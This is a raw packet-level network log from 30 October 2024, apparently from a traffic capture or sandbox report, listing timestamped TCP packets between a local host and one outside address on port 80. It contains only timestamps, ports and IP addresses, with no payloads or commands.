                                                        Oct 30, 2024 05:22:54.902040958 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.907479048 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.137881994 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.138395071 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.143811941 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.143886089 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.143929958 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.144006968 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.144041061 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.149317026 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.257710934 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.263237000 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.263346910 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.263490915 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.268829107 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.495832920 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.501235008 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.501405001 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:55.620784044 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:55.626291990 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.670042992 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.670828104 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671462059 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671478033 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671525955 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.671555042 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.671922922 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.671973944 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.672435045 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.672494888 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.672540903 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.672596931 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.673002958 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.673051119 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.674607038 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.674659014 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.677349091 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.677398920 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.677481890 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.678287983 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.787363052 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.787384987 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.788270950 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793107986 CET8049793188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.793365955 CET8049794188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.793441057 CET4979480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793469906 CET4979380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.793673038 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:56.796452999 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.796577930 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:56.801989079 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.152132034 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.157893896 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.403933048 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.448900938 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.615575075 CET8049796188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.667546988 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.741004944 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.746412039 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:57.746542931 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.746654987 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:57.751970053 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.105290890 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.110713005 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.341034889 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.386293888 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.538539886 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.589541912 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.664568901 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.665102005 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670480013 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.670574903 CET8049797188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:58.670584917 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670648098 CET4979780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.670756102 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:58.676186085 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.027770996 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.033062935 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.258132935 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.308190107 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.447565079 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.495688915 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.569590092 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.570410013 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575346947 CET8049798188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.575412035 CET4979880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575685024 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.575774908 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.575903893 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.581204891 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:59.933326006 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:59.938699961 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.170702934 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.214561939 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.531229019 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.573796034 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.647258043 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.648149967 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653147936 CET8049804188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.653558969 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:00.653615952 CET4980480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653657913 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.653740883 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:00.659075022 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.012856960 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.018548965 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.260462999 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.308290958 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.569513083 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.620718956 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.684750080 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.685036898 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.690370083 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.690429926 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.690567970 CET8049810188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.690627098 CET4981080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.692276001 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.696742058 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.697304010 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.697608948 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.702702999 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.702806950 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.702904940 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:01.708177090 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:01.755992889 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.058355093 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.063848972 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.167089939 CET8049818188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.167149067 CET4981880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.297053099 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.339560986 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.602619886 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.651926994 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.725080967 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.725894928 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.730856895 CET8049820188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.731426954 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:02.731482983 CET4982080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.731518030 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.731684923 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:02.737174034 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.089859009 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.095352888 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.343373060 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.386318922 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.642236948 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.642267942 CET8049828188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.642354965 CET4982880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.783714056 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.789091110 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:03.789150000 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.789321899 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:03.794564009 CET8049834188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:04.149643898 CET4983480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.369278908 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.417656898 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.481281996 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.482279062 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.486989975 CET8049959188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.487041950 CET4995980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.487622023 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.487694025 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.487828016 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.493065119 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.603358984 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.608707905 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.608784914 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.608897924 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.614162922 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.839660883 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.846316099 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.846337080 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:23.964682102 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:23.970690012 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.094664097 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.152072906 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.228070974 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.277045965 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.408994913 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421516895 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421561003 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.421648979 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.464554071 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.539722919 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.539877892 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.540674925 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.545965910 CET8049963188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546041012 CET4996380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546185970 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546258926 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546519995 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.546561003 CET8049965188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.546614885 CET4996580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.552299023 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:24.902158022 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:24.907708883 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.142275095 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.183346987 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.343456984 CET8049970188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.386413097 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.481271029 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.486639977 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.486730099 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.486816883 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.492094994 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:25.839690924 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:25.845052958 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.091653109 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.136442900 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.285461903 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.339551926 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.398530006 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.399466038 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.404515028 CET8049976188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.404572010 CET4997680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.404830933 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.404906034 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.405018091 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.410310984 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:26.761555910 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:26.767076969 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.002424002 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.042711020 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.328603029 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.370798111 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.453687906 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.455425978 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.460288048 CET8049983188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.460342884 CET4998380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.460841894 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.460911989 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.461026907 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.466293097 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:27.808382988 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:27.813832998 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.067584038 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.120836973 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.265152931 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.308322906 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.385340929 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.386243105 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391235113 CET8049990188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.391683102 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.391762972 CET4999080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391805887 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.391906977 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.397250891 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:28.745898008 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:28.751395941 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.012952089 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.058317900 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.218380928 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.261495113 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.331163883 CET4997080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.335990906 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.336779118 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342266083 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.342350960 CET8049996188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.342365026 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342403889 CET4999680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.342559099 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.347868919 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.418677092 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.419564962 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.424989939 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.425074100 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.425164938 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.430490017 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.470773935 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.536856890 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.542196989 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.542265892 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.542385101 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.547662020 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.777234077 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.782536983 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.782656908 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.826170921 CET8050002188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:29.826246977 CET5000280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.886553049 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:29.891992092 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.013386965 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.058342934 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.141432047 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.183408022 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.319641113 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.357450962 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.370836973 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.402077913 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.478017092 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.478054047 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.479317904 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.483679056 CET8050003188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.483768940 CET5000380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484083891 CET8050005188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.484136105 CET5000580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484699965 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.484771967 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.484951019 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.490308046 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:30.839778900 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:30.845267057 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.089333057 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.136441946 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.392759085 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.448950052 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.523296118 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.523399115 CET4979680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.526107073 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.527278900 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.531807899 CET8050011188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.531860113 CET5001180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.532686949 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.532763958 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.532834053 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.538186073 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:31.886759043 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:31.892287016 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.183770895 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.230205059 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.356081009 CET8050017188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.402066946 CET5001780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.476214886 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.481549025 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.481609106 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.481703997 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.487056017 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:32.839766979 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:32.845117092 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.102971077 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.152065992 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.274669886 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.323946953 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.398214102 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.398874044 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.403909922 CET8050025188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.403963089 CET5002580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.404175997 CET8050031188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:23:33.404243946 CET5003180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:23:33.404351950 CET5003180192.168.2.4188.114.96.3
